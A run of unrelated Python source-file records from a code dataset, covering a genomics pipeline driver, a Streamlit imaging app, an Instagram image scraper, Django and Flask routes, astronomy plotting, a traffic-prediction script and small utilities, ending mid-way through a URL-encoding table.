subcommands[2][1].append('')\n\n # unknown_N_filter\n subcommands[3][1].append('')\n subcommands[3][1].append('')\n subcommands[3][1].append(subcommands[7][1][3])\n print(subcommands[3][1])\n\n # remove_chr00\n subcommands[4][1].append('')\n subcommands[4][1].append('')\n\n # get_known_data\n subcommands[5][1].append('')\n subcommands[5][1].append('')\n subcommands[5][1].append('')\n subcommands[5][1].append(subcommands[7][1][4])\n subcommands[5][1].append(subcommands[7][1][5])\n\n # filter_vcfs\n subcommands[6][1].append('')\n subcommands[6][1].append(subcommands[7][1][1])\n subcommands[6][1].append('')\n\n subcommands[6][1].clear()\n\n for multiplicity in Counter([pair[0] for pair in subcommands]).values():\n if multiplicity != 1:\n print(\"Please only call a function_called once.\")\n return 5\n\n print(subcommands)\n\n # # Consult with required args checklist\n count = 0\n for i in range(len(subcommands)):\n function_called = subcommands[i][0]\n args = subcommands[i][1]\n for j in range(len(args)):\n if args[j] == '' or args[j] == {}:\n if i == 0 and j == 0:\n # no original input file was provided\n print(\"Error: no original input file was specified.\")\n return 6\n if j == 0:\n if function_called == \"get_vcfs\" or function_called == \"filter_vcfs\":\n if len(subcommands[i - 2][1]) == 0:\n print(\"Error: no original input file was specified.\")\n return 6.25\n else:\n if i != 0 and len(subcommands[i - 1][1]) == 0:\n print(\"Error: no original input file was specified.\")\n return 6.375\n if function_called == \"get_vcfs\" or function_called == \"filter_vcfs\":\n args[j] = \"%s\" % (subcommands[i - 2][1][1])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][1])\n print(\"No input file was specified for %s. Using %s.\" % (function_called, args[j]))\n if j == 1:\n # no output was provided - create output file based on input parameters\n if function_called != \"get_depth\" and (os.path.isdir(args[0]) or function_called == \"get_known_data\"):\n containing_folder = subcommands[i][1][0][:subcommands[i][1][0].rfind('/') + 1][\n :subcommands[i][1][0].rfind('/') + 1]\n if function_called == \"merge_bams\":\n args[j] = \"%smerged_bams\" % containing_folder\n elif function_called == \"get_vcfs\":\n args[j] = \"%svcfs\" % containing_folder\n elif function_called == \"remove_chr00\":\n args[j] = \"%sno00_vcfs\" % containing_folder\n elif function_called == \"unknown_N_filter\":\n args[j] = \"%sN_filtered_vcfs\" % containing_folder\n elif function_called == \"get_known_data\":\n args[j] = \"%sknown_calls\" % containing_folder\n elif function_called == \"filter_vcfs\":\n args[j] = \"%sfiltered_vcfs\" % containing_folder\n\n else:\n if function_called == \"merge_bams\":\n print(\"Error: merged_bams must take a directory.\")\n print('|' + args[0] + '|')\n return 6.5\n if function_called == \"get_vcfs\":\n args[j] = \"%s.vcf\" % (subcommands[i][1][0])\n elif function_called == \"remove_chr00\":\n args[j] = \"%s_no00.vcf\" % (subcommands[i][1][0][:-4])\n elif function_called == \"unknown_N_filter\":\n args[j] = \"%sno_high_Ns.vcf\" % (subcommands[i][1][0][:-4])\n elif function_called == \"get_depth\":\n args[j] = \"%s%s_depth_file.txt\" % (subcommands[i][1][0][:subcommands[i][1][0].rfind('/') + 1][\n :subcommands[i][1][0].rfind('/') + 1], subcommands[i][1][0][subcommands[i][1][0].rfind('/') + 1:])\n elif function_called == \"filter_vcfs\":\n args[j] = \"%s_filtered.vcf\" % (subcommands[i][1][0][:-4])\n print(\"No output file was specified for %s. Writing to %s.\" % (function_called, args[j]))\n if j == 2 and function_called == \"unknown_N_filter\":\n #no reference file was provided\n print(\"Error: to run unknown_N_filter, you must take a reference file.\")\n return 6.5\n if j == 3:\n # MUST ADD A DIGIT TO ALL INDEXES BELOW!!\n # no depth_file was provided\n if len(subcommands[1][1]) < 2 and (subcommands[i - 1][0] == \"unknown_N_filter\" or\n len(subcommands[i - 1][1]) < 3) and \\\n (subcommands[i - 1][0] == \"unknown_N_filter\" or len(subcommands[i - 2][1]) < 3):\n print(\"Error: no original depth_file was specified.\")\n return 7\n else:\n if subcommands[i - 1][0] != \"unknown_N_filter\" and len(subcommands[i - 1][1]) >= 3:\n args[j] = \"%s\" % (subcommands[i - 1][1][2])\n else:\n args[j] = \"%s\" % (subcommands[1][1][1])\n print(\"No depth file was specified for %s. Using %s\" % (function_called, args[j]))\n if j == 4:\n # no true_positive_file was provided\n if len(subcommands[i - 1][1]) < 4 and len(subcommands[i - 2][1]) < 4:\n print(\"Error: no original true_positive_file was specified.\")\n return 8\n else:\n if len(subcommands[i - 2][1]) >= 4:\n args[j] = \"%s\" % (subcommands[i - 2][1][3])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][3])\n print(\"No true_positive_file was specified for %s. Using %s\" % (function_called, args[j]))\n if j == 5:\n # no false_positive_file was provided\n if len(subcommands[i - 1][1]) < 5 and len(subcommands[i - 2][1]) < 5:\n print(\"Error: no original false_positive_file was specified.\")\n return 9\n else:\n if len(subcommands[i - 2][1]) >= 5:\n args[j] = \"%s\" % (subcommands[i - 2][1][4])\n else:\n args[j] = \"%s\" % (subcommands[i - 1][1][4])\n print(\"No false_positive_file was specified for %s. Using %s\" % (function_called, args[j]))\n if len(args) >= 2 and os.path.isdir(args[0]) and not os.path.isdir(args[1]) and function_called != \\\n \"get_depth\" and function_called != \"all\":\n os.makedirs(args[1])\n\n count += 1\n\n for pair in subcommands:\n if not len(pair[1]) == 0:\n if pair[0] != \"merge_bams\" and os.path.isdir(pair[1][0]):\n first = True\n if not os.listdir(pair[1][0]):\n print(\"%s was called with an empty directory.\" % pair[0])\n return 10\n for file in os.listdir(pair[1][0]):\n print(file)\n is_callable = False\n in_file = pair[1][0] + '/' + file\n out_file = pair[1][1] + '/' + file\n if pair[0] == \"merge_bams\" and file.endswith(\".bam\"):\n is_callable = True\n out_file += \"m.bam\"\n elif pair[0] == \"get_depth\" and file.endswith(\".bam\"):\n is_callable = True\n out_file = pair[1][0][:pair[1][0].rfind('/')]\n if pair[1][0].endswith('/'):\n out_file = out_file[:out_file.rfind('/')]\n out_file += '/' + \"%s_depth_file.txt\" \\\n % pair[1][0][pair[1][0].rfind('/') + 1:]\n elif pair[0] == \"get_vcfs\" and file.endswith(\".bam\"):\n is_callable = True\n out_file += \".vcf\"\n elif pair[0] == \"remove_chr00\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".no00.vcf\"\n elif pair[0] == \"unknown_N_filter\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".no_high_Ns.vcf\"\n elif pair[0] == \"get_known_data\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file = pair[1][1] + '/'\n elif pair[0] == \"filter_vcfs\" and file.endswith(\".vcf\"):\n is_callable = True\n out_file += \".filtered.vcf\"\n if not is_callable:\n continue\n parameters = \"'%s', '%s', \" % (in_file, out_file)\n for parameter in pair[1][2:]:\n if isinstance(parameter, dict):\n parameters += \"%s, \" % parameter\n else:\n if parameter == depth_file:\n parameters += \"%s, \" % depth_dict\n else:\n parameters += \"'%s', \" % parameter\n if pair[0] == \"get_depth\" or pair[0] == \"get_known_data\":\n parameters += \"%s\" % first\n else:\n parameters = parameters[:-2]\n\n print(\"Calling %s\" % pair[0])\n print(parameters)\n\n function_called_return_value = eval(\"%s.%s(%s)\" % (pair[0], pair[0], parameters))\n if function_called_return_value != 0:\n return function_called_return_value\n first = False\n is_callable = False\n\n else:\n parameters = \"\"\n for parameter in pair[1]:\n if isinstance(parameter, dict):\n parameters += \"%s, \" % parameter\n else:\n parameters += \"'%s', \" % parameter\n if pair[0] == \"get_depth\" or pair[0] == \"get_known_data\":\n parameters += \"%s\" % True\n else:\n parameters = parameters[:-2]\n print(\"Calling %s\" % pair[0])\n\n function_called_return_value = eval(\"%s.%s(%s)\" % (pair[0], pair[0], parameters))\n if function_called_return_value != 0:\n return function_called_return_value\n\n if pair[0] == \"get_depth\":\n depth_file = pair[1][1]\n reading_depth = open(depth_file)\n depth_dict = {}\n line = reading_depth.readline()\n while line:\n file_depth = line.split(':')\n depth_dict[file_depth[0]] = float(file_depth[1])\n line = reading_depth.readline()\n reading_depth.close()\n\n return 123\n\n\n# ---\nsys.exit(main(sys.argv[1:]))\n","sub_path":"utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"363107090","text":"import streamlit as st\nfrom multiapp import MultiApp\nfrom apps import home, app1,app2 # import your app modules here\nfrom PIL import Image\n\nhi=Image.open('radiographer.png')\nst.set_page_config(page_title='MedAI',page_icon=hi)\n\nst.markdown(\n '''\n \n ''', \n unsafe_allow_html=True)\n\napp = MultiApp()\nst.sidebar.title('Image Analysis')\n# Add all your application here\napp.add_app(\"Home\", home.app)\napp.add_app(\"Haemorrhage Detection\", app1.app)\napp.add_app(\"Pneumonia Detection\",app2.app)\n\n# The main app\napp.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"579626269","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup as bs\nimport time\nimport os\nimport requests\nimport re\nfrom urllib.request import urlopen\nfrom urllib import request\nimport json\nimport shutil\nimport sys\nfrom pandas.io.json import json_normalize\nimport pandas as pd, numpy as np\n\n\nusername= input('Input instagram username : ')\nbrowser = webdriver.Chrome('E:/Downloads/chromedriver_win32/chromedriver')\nbrowser.get('https://www.instagram.com/'+username+'/?hl=en')\n# browser = requests.get('https://www.instagram.com/'+username+'/?hl=en')\nPagelength = browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\n#Extract links from user profile page\nlinks=[]\n# source = browser.text\nsource = browser.page_source\ndata=bs(source, 'html.parser')\nbody = data.find('body')\nscript = str(body.find('script', text=lambda t: t.startswith('window._sharedData')))\npage_json = script.split(' = ', 1)[1].rstrip(';')\ndata = json.loads(page_json)\n\n# Check account is exists\nif 'HttpErrorPage' in data['entry_data'].keys():\n print('Instagram account not found')\n sys.exit()\n\naccount_private = data['entry_data']['ProfilePage'][0]['graphql']['user']['is_private']\n\nif account_private == True:\n print(\"Make sure account isn't private\")\n sys.exit()\n\n# #try 'script.string' instead of script.text if you get error on index out of range\n# for link in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:\n# links.append('https://www.instagram.com'+'/p/'+link['node']['shortcode']+'/')\n#try with ['display_url'] instead of ['shortcode'] if you don't get links \n#Extract links from hashtag page\nlinks=[]\n# source = browser.page_source\n# data=bs(source, 'html.parser')\n# body = data.find('body')\n# script = str(body.find('script', text=lambda t: t.startswith('window._sharedData')))\n# page_json = script.split(' = ', 1)[1].rstrip(';')\n# data_post = json.loads(page_json)\nfor link in data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_owner_to_timeline_media']['edges']:\n links.append('https://www.instagram.com'+'/p/'+link['node']['shortcode']+'/')\n\n\nprint(links)\nprint(len(links))\nsys.exit()\n# result=pd.DataFrame()\npath = \"S:/scraper-instagram/\"\nfor i in range(2):\n try:\n page = requests.get(links[i]).text\n data=bs(page, 'html.parser')\n body = data.find('body')\n script = str(body.find('script'))\n raw = script.split(' = ', 1)[1].strip().replace('window._sharedData =', '').replace(';', '')\n json_data=json.loads(raw)\n\n posts = json_data['entry_data']['PostPage'][0]['graphql']['shortcode_media']\n # posts= json.dumps(posts)\n # posts = json.loads(posts))\n\n # Making Folder of Feed\n folder_name = posts['shortcode']\n \n # print(os.path.isdir((path+folder_name)))\n # Check folder is exists?\n check_folder = os.path.isdir(path+folder_name)\n \n if check_folder == True:\n shutil.rmtree(path+folder_name)\n # os.rmdir(path+folder_name)\n os.mkdir(path+folder_name)\n else:\n os.mkdir(path+folder_name)\n\n # Insert Display Media to Folder Feed\n r = requests.get(posts['display_url'])\n with open(path+folder_name+\"/\"+posts['shortcode']+\".jpg\", 'wb') as f:\n f.write(r.content) \n\n if 'edge_sidecar_to_children' in posts.keys():\n # Insert Pther Media to Folder Feed\n json_other_media = json.dumps(posts['edge_sidecar_to_children']['edges'])\n json_other_media = json.loads(json_other_media)\n\n # shutil.rmtree(path+folder_name)\n for other_media in json_other_media:\n detail = other_media['node']\n s = requests.get(detail['display_url'])\n with open(path+folder_name+\"/\"+detail['shortcode']+\".jpg\", 'wb') as f:\n f.write(s.content) \n\n if os.path.exists(path+folder_name+'/'+folder_name+'.jpg'):\n os.remove(path+folder_name+'/'+folder_name+'.jpg')\n \n\n # Insert Caption Feed to Folder\n caption_media = json.dumps(posts['edge_media_to_caption']['edges'])\n caption_media = json.loads(caption_media)\n caption_media = caption_media[0]['node']['text']\n\n write_caption = open(path+folder_name+\"/\"+\"caption.txt\", 'w', encoding='utf-8')\n write_caption.write(str(caption_media)) \n \n except AssertionError as error:\n print(error)\n np.nan\n\n# result = result.drop_duplicates(subset = 'shortcode')\n# result.index = range(len(result.index))\n\n# html = result.to_html()\n# text_file = open(\"index1.html\", \"w\")\n# text_file.write(str(html.encode(\"utf-8\")))\n# text_file.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416815113","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'profile'\n\nurlpatterns = [\n # \"/polls\" is the prefix\n path('', views.index, name='index'),\n path('index', views.index, name='index'),\n path('/class/', views.classInfo, name='class'),\n path('classlist', views.classlist, name='classlist'),\n path('staff', views.staff, name='staff'),\n path('UpdateEmail',views.UpdateEmail, name='UpdateEmail'),\n path('UpdatePhone',views.UpdatePhone, name='UpdatePhone'),\n path('/registerClass',views.registerClass, name='registerClass'),\n]\n","sub_path":"personal/yxg352/CameronTests/profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134651924","text":"import os\nimport shutil\n\n#Crear carpeta\nif not os.path.isdir(\"./mi_carpeta\"):\n os.mkdir(\"./mi_carpeta\") #Si no existe la carpeta la crea\nelse:\n print(\"El directorio ya existe\")\n\n#Eliminar mi_carpeta\nos.rmdir('./mi_carpeta')\n\n#Copiar carpeta\nruta_original = './mi_carpeta'\nruta_nueva = './mi_carpeta_COPY'\nshutil.copytree(ruta_original, ruta_nueva)\n\n#Leer contenido carpeta\nprint(\"Contenido carpeta\")\ncontenido = os.listdir(\"./mi_carpeta\")\nprint(contenido)\n\nfor fichero in contenido:\n print(\"Ficheros: \" + fichero)","sub_path":"Python/practicas_victor_masterpython/14-sistema-archivos/directorios.py","file_name":"directorios.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"238072174","text":"# -*- coding: utf-8 -*-\nfrom flask import (Blueprint, request, render_template, flash, url_for,\n \tredirect, session)\nfrom flask.ext.login import login_required\nfrom nektime.interview.forms import InterviewForm, QuestionForm\nfrom nektime.utils import flash_errors\nfrom nektime.models import User, Answer, Question\n\nfrom sqlalchemy import desc\nimport random\n\nblueprint = Blueprint(\"interview\", __name__, url_prefix='',\n static_folder=\"../static\")\n\n\n\n@blueprint.route(\"/interview/\", methods=['GET','POST'])\n@login_required\ndef interview(question_id=None):\n question=Question.query.get(question_id)\n user=User.query.get(session['user_id'])\n created_at=''\n form = InterviewForm()\n if form.validate_on_submit():\n new_answer = Answer.create(text=form.answer.data, user=user, question=question, created_at=created_at)\n flash(\"Your answer has been submitted\")\n return redirect(url_for('interview.list', question=question.id))\n return render_template(\"interview/interview.html\", form=form, question=question)\n\n@blueprint.route(\"/list/\")\ndef list(question):\n answers = Answer.query.filter_by(question_id=question).all()\n my_question = Question.query.filter_by(id=question).first()\n return render_template('interview/list.html', my_question=my_question, answers=answers)\n\n@blueprint.route(\"/question/\", methods=['GET','POST'])\n@login_required\ndef question():\n form = QuestionForm()\n if form.validate_on_submit():\n # text=form.question.data\n user=User.query.get(session['user_id'])\n created_at = ''\n new_question = Question.create(text=form.question.data, user=user, created_at=created_at)\n flash(\"Your question has been submitted\")\n return redirect(url_for('interview.dashboard'))\n return render_template(\"interview/question.html\", form=form)\n\n\n@blueprint.route(\"/dashboard/\")\ndef dashboard():\n questions = Question.query.order_by(Question.id).all()\n return render_template(\"interview/dashboard.html\", questions=questions)\n","sub_path":"nektime/deactivate/interview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246487123","text":"def bs(a, l, r, x): \r\n if r >= l: \r\n mid =int((l+r)/2)\r\n print(\"Guess: \",a[mid],\"Between\",a[l],\"and\",a[r])\r\n if a[mid] == x: \r\n return mid\r\n\r\n elif a[mid] > x: \r\n return bs(a, l, mid-1, x) \r\n\r\n else: \r\n return bs(a, mid + 1, r, x) \r\n else: \r\n return -1\r\n \r\ns=int(input(\"Enter size:\"))\r\na=[0]*s\r\nprint(\"Enter List: \")\r\nfor i in range(s):\r\n a[i]=int(input())\r\n\r\nprint(a)\r\nx=int(input(\"\\nEnter the Key:\"))\r\nresult = bs(a, 0, len(a)-1, x) \r\nif result != -1: \r\n print (\"Element is present at index:\",result )\r\nelse: \r\n print (\"Element is not present in array\")\r\n","sub_path":"December-01/py_anuppriya_binary.py","file_name":"py_anuppriya_binary.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"590618543","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 12:23:28 2019\n\nCode to plot M_star vs z\n\n@author: ppxee\n\"\"\"\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nimport matplotlib.colors as colors\nfrom scipy.stats import binned_statistic_2d\nplt.close('all')\n\n\n### Get fits ###\ntbdata = fits.open('mag_flux_tables/mag_flux_table_best_extra_clean_no06.fits')[1].data\ndr11 = fits.open('UDS_catalogues/DR11-2arcsec-June24-2018+plusXY_best.fits')[1].data\nvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe.fits')[1].data\nfullxray = Table.read('UDS_catalogues/DR11-2arcsec-June24-2018+plusXY_best_chandra.fits')\nsternvary = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_stern.fits')[1].data\nstern = fits.open('UDS_catalogues/SpUDS_IRAC_catalogue_DR11data_stern.fits')[1].data\nnosternvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC.fits')[1].data\ndeviant = fits.open('variable_tables/no06_variables_chi30_2arcsec_deviant_DR11data_restframe.fits')[1].data\nsn = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_SN.fits')[1].data\ndev07 = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_07B.fits')[1].data\n#deviant = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_restframe_allspecz.fits')[1].data\n\n### with x/nox split ###\n#noxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_noXray_DR11data_restframe.fits')[1].data\n#xvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_Xray_DR11data_restframe.fits')[1].data\nnoxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_nochanXray_DR11data_restframe.fits')[1].data\nxvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_chandata_DR11data_restframe.fits')[1].data\n\nnoxsternvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_noXray_stern.fits')[1].data\nxsternvarydata = fits.open('variable_tables/no06_variables_chi30_2arcsec_DR11data_SpUDSdata_IRAC_Xray_stern.fits')[1].data\n\ndef ignore_zeros(m):\n m[m==0] = np.nan\n mask = ~np.isnan(m)\n m = m[mask]\n return m, mask\n\ndef prep_variables(tbdata):\n z = vari_funcs.get_z(tbdata) # get redshift\n m = tbdata['Mstar_z_p'] #get mass\n m, mask = ignore_zeros(m) #mask those with null mass\n z = z[mask] #apply mask to z array\n return z, m\n\n\nz, m = prep_variables(dr11)\nnoxz, noxm = prep_variables(noxvarydata)\nxz, xm = prep_variables(xvarydata)\nvaryz, varym = prep_variables(varydata)\nallxz, allxm = prep_variables(fullxray)\nallsternz, allsternm = prep_variables(stern)\nsternz, sternm = prep_variables(sternvary)\nnosternz, nosternm = prep_variables(nosternvarydata)\nnoxsternz, noxsternm = prep_variables(noxsternvarydata)\nxsternz, xsternm = prep_variables(xsternvarydata)\ndevz, devm = prep_variables(deviant)\nsnz, snm = prep_variables(sn)\ndev07z, dev07m = prep_variables(dev07)\n\nx_edges = np.linspace(0,4.5,100)\ny_edges = np.logspace(5,12,100)\n\nH, xbins, ybins, _ = plt.hist2d(z, m, bins=[x_edges, y_edges])\n\n\nplt.figure()\nplt.hist(m, bins=y_edges, \n histtype='step')\n\n#plt.hist([noxm, xm, devm, varym], bins=np.logspace(4.5,12), color=['b','r','y','g'], \n# histtype='step', label=['Non-X-ray Variable','X-ray Variable','Deviant','all variables'])\nplt.xlabel('$M_{star}$')\nplt.ylabel('Number')\nplt.xscale('log')\n\nplt.figure()\nplt.hist(z, bins=x_edges, \n histtype='step')\nplt.xlabel('z')\nplt.ylabel('Number')\n\n##plt.figure(figsize=[9,7])\nplt.figure(figsize=[10,7])\nplt.pcolormesh(xbins, ybins, H.T, cmap='binary',vmax=200)\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\n#plt.plot(allsternz, allsternm, 'm.', label='Stern AGN', alpha=0.5)\nplt.plot(allxz, allxm, 'ks',markersize=5, label='X-ray AGN')\nplt.plot(noxz, noxm, 'bo', label='Variable Non-X-ray AGN')\nplt.plot(xz, xm, 'ro', label='Variable X-ray AGN')\n#plt.plot(devz, devm, 'yd', label='Deviant in 07B')\n#plt.plot(sternz, sternm, 'yd',markersize=10, mfc='none', label='Stern Variable')\n\n#plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n\nplt.yscale('log')\nplt.xlim(xmin=-0.1, xmax=4.5)\nplt.ylim(ymin=2e5, ymax=5e11)\nplt.legend(loc='lower right')\nplt.xlabel('z')\nplt.ylabel('$M_{star}$')\n#plt.colorbar()\nplt.tight_layout()\n#\n#### Plot with stern details\n##plt.figure(figsize=[9,7])\n#plt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\n#plt.plot(allsternz, allsternm, 'k.', label='Stern AGN', alpha=0.5)\n##plt.plot(allxz, allxm, 'k+', label='X-ray Non-Variable')\n##plt.plot(noxsternz, noxsternm, 'bo', label='Non-X-ray Variable')\n##plt.plot(xsternz, xsternm, 'ro', label='X-ray Variable')\n#plt.plot(nosternz, nosternm, 'go', label='Variable Non-Stern AGN')\n##plt.plot(xz, xm, 'go')#, label='X-ray Variable')\n#plt.plot(sternz, sternm, 'mo', label='Variable Stern AGN')\n#\n##plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n#\n#plt.yscale('log')\n#plt.xlim(xmin=-0.1, xmax=4.5)\n#plt.ylim(ymin=2e5, ymax=5e11)\n#plt.legend(loc='lower right')\n#plt.xlabel('z')\n#plt.ylabel('$M_{star}$')\n#plt.tight_layout()\n\n### Plot with deviant details\n#plt.figure(figsize=[9,7])\nplt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='Galaxy')\nplt.pcolormesh(xbins, ybins, H.T, cmap='binary',vmax=200, label='Galaxies')\n#plt.plot(allxz, allxm, 'ks', label='X-ray AGN')\nplt.plot(noxz, noxm, 'bo', label='Variable Non-X-ray AGN')\nplt.plot(xz, xm, 'ro', label='Variable X-ray AGN')\nplt.plot(devz, devm, 'ms', markersize=6, label='Deviant')\nplt.plot(snz, snm, 'y*', markersize=12, label='Potential SN')\nplt.plot(dev07z, dev07m, 'gd', markersize=8, label='Deviant in 07B')\n\n#plt.hlines(2e9,-0.1,4.5,linestyle='dashed')\n\nplt.yscale('log')\nplt.xlim(xmin=-0.1, xmax=4.5)\nplt.ylim(ymin=2e5, ymax=5e11)\nplt.legend(loc='lower right')\nplt.xlabel('z')\nplt.ylabel('$M_{star}$')\nplt.tight_layout()\n##%% Plot with flux colours ###\n#### get fluxes from mag-flux ###\n#\n#def get_mean_flux(tbdata):\n# flux = vari_funcs.flux4_stacks(tbdata)\n# meanflux = np.nanmean(flux, axis=1)\n# return meanflux\n#\n#def get_jansky_flux(tbdata):\n# meanmag = tbdata['KMAG_20']\n# meanflux = 10**(23-((meanmag+48.6)/2.5))\n# return meanflux\n# \n#meanflux = get_mean_flux(tbdata)\n#meannoxvary = get_mean_flux(noxvarydata)\n#meanxvary = get_mean_flux(xvarydata)\n#meanvary = get_mean_flux(varydata)\n#\n#### mask flux arrays and make flux colour ###\n#meannoxvary = meannoxvary[noxmask]\n#meanxvary = meanxvary[xmask]\n#\n#### find max and min ###\n#cmax = np.nanmax([np.nanmax(meannoxvary), np.nanmax(meanxvary)])\n#cmin = np.nanmin([np.nanmin(meannoxvary), np.nanmin(meanxvary)])\n#\n#plt.figure(figsize=[10,7])\n#plt.plot(z, m, '.',markersize=1, color='tab:gray', alpha=0.25, label='UDS Galaxy')\n#plt.plot(allxz, allxm, 'k+', label='X-ray Non-Variable')\n##plt.scatter(noxz, noxm, marker='o', c=meannoxvary, label='Non-X-ray Variable', \n## norm=colors.LogNorm(vmin=cmin, vmax=cmax), zorder=3)\n##plt.scatter(xz, xm, marker='o', c=meanxvary, label='X-ray Variable', \n## norm=colors.LogNorm(vmin=cmin, vmax=cmax), zorder=3)\n##cbar=plt.colorbar()\n##cbar.set_label('Mean 2\" Flux')\n#plt.yscale('log')\n#plt.xlim(xmin=-0.1, xmax=4.5)\n#plt.ylim(ymin=1e4, ymax=3e12)\n#plt.legend(loc='lower right')\n#plt.xlabel('z')\n#plt.ylabel('$M_{star}$')\n#plt.tight_layout()\n\n","sub_path":"mstar_z_plot_hess.py","file_name":"mstar_z_plot_hess.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632716800","text":"import sys\nimport os\nimport base64\nfrom pathlib import Path\ndir = os.path.dirname(__file__)\n\narea_input = str(sys.argv[1])\nday_input = str(sys.argv[2])\ntime_input = str(sys.argv[3])\n\ndir = os.path.dirname(__file__)\nimport cv2\nimport pandas as pd\nimport numpy as np # linear algebra\nfrom sklearn.model_selection import train_test_split\nfrom pprint import pprint\nfrom sklearn.metrics import confusion_matrix\n\ndef process_day(day):\n switcher = {\n \"Saturday\":0,\n \"Sunday\" :1,\n \"Monday\":2,\n \"Tuesday\":2,\n \"Wednesday\":2,\n \"Thursday\":1,\n \"Friday\":0\n }\n return switcher.get(day, \"ERROR\")\ndef process_holiday(day):\n if(day =='Friday' or day =='Saturday'):\n return 1\n else:\n return 0\nfileToReadCSV = f'{area_input}-test-final.csv'\nfullCSVPath = \"G:\\SPL3Repo\\SoftwareProjectLab3_GG\\TrafficAnalyzerUI\\\\bin\\Debug\\Dataset_CSV\\\\\"+fileToReadCSV\ncsvFilePath = os.path.join(dir, fullCSVPath)\ndataset = pd.read_csv(fullCSVPath, sep=',', error_bad_lines=False)\npos = 3\nX = dataset.iloc[:, :4]\npredictions = []\nfor pos in range(4, dataset.shape[1]):\n Y = dataset.iloc[:, pos]\n # pos = pos+1\n # print(Y)\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=0)\n from sklearn.preprocessing import StandardScaler\n from sklearn.model_selection import cross_val_score\n sc = StandardScaler()\n sc.fit(X_train)\n X_train_std = sc.transform(X_train)\n X_test_std = sc.transform(X_test)\n\n # Applying Knn\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.metrics import accuracy_score\n\n knn = KNeighborsClassifier(n_neighbors=5, p=2, metric='minkowski')\n # knn.fit(X_train_std, y_train)\n knn.fit(X, Y)\n timeToPredict = 0.00\n tmp = []\n for i in range(0, 13):\n tmp.append(knn.predict([[1,process_holiday('Sunday'), process_day('Sunday'), timeToPredict]]))\n timeToPredict += 2.00\n predictions.append(tmp)\nsummations = []\nfor i in range(0, 13):\n summations.append(0)\n\n#print(predictions)\nfor i in range(0, 13):\n for j in range(0, 21):\n if (predictions[j - 1][i] == 'Y'):\n summations[i] += 2\n if (predictions[j - 1][i] == 'R'):\n summations[i] += 3\n if (predictions[j - 1][i] == 'G'):\n summations[i] += 1\nlabels = ['00:00','02:00','04:00','06:00','08:00','10:00','12:00','14:00','16:00','18:00','20,00','22.00', '23.59']\nimport matplotlib.pyplot as plt\nimport io\nimport urllib, base64\n#print(len(summations))\nplt.bar(labels,summations)\n\nplt.title('Traffic Intensity Per Day')\nplt.xlabel('Time')\nplt.ylabel('Traffic Intensity')\n#plt.show()\nfig = plt.gcf()\nbuf = io.BytesIO()\nfig.savefig(buf, format='png')\nbuf.seek(0)\nstring = base64.b64encode(buf.read()).decode(\"utf-8\")\nprint(string)\n\n\n\n\n\n","sub_path":"ImageToDataPreprocessing/Codes/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"322812465","text":"def dencoding(string,encode=True):\r\n\tdencoding_dict = {'!': '%21','\"': '%22','#': '%23','$': '%24','&': '%26','*': '%2A','+': '%2B','-': '%2D','/': '%2F',':': '%3A','=': 